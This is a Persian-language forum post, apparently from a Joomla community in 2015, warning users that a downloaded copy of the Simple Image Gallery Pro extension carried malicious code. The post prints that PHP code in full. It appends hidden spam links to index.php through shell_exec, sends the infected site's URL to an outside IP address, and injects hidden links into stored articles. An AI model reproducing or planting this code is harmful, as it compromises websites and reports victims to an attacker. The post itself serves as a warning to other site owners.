-
گزارش فایل مخرب در افزونه
با سلام
امروز یک گزارش داشتم از یکی از کاربران برای فایل مخرب در افزونه simple-image-gallery-pro-v-307 که از سایت http:// webganje.com/index.php/joomla-extension/simple-image-gallery-pro-v-307 دانلود شده بود.
که بعد از بررسی متوجه شدم شامل کد مخرب زیر بود
shell_exec('echo "'."?>\n<div style='text-indent:100%;white-space:nowrap;overflow:hidden;height:1px;'><h1>Main Menu</h1><ul style='list-style-type:none;'><li><a href='http://www.plataformasteam.com'>Plataforma Steam</a></li><li><a href='http://www.foroguate.com'>ForoGuate</a></li><li><a href='http://www.forocarros.org'>ForoCarros</a></li></ul></div>\n<?php".'" >> ../index.php');
file_get_contents("http://176.67.167.186/insert.php?url=http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$db2 = JFactory::getDBO();
$db2->setQuery("SELECT id, introtext FROM #__content LIMIT 100");
$results = $db2->loadObjectList();
if($results){
foreach($results as $result) {
$db2->setQuery("UPDATE #__content SET introtext = ".$db->quote($result->introtext."<div style='text-indent:100%;white-space:nowrap;overflow:hidden;height:1px;'><h1>Main Menu</h1><ul style='list-style-type:none;'><li><a href='http://www.plataformasteam.com'>Plataforma Steam</a></li><li><a href='http://www.foroguate.com'>ForoGuate</a></li><li><a href='http://www.forocarros.org'>ForoCarros</a></li></ul></div>")." WHERE id = ".$result->id);
$db2->query();
}
}
لطفا از استفاده از افزونه ها دقت بفرمایید.
موفق و پیروز باشید.
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
-
4 کاربر زیر از محمد محسنی عزیز به خاطر این پست مفید تشکر کرده اند.
-
08-17-2015 07:19 PM
# ADS
تبلیغات در جوملا فارسی
علاقه مندی ها (Bookmarks)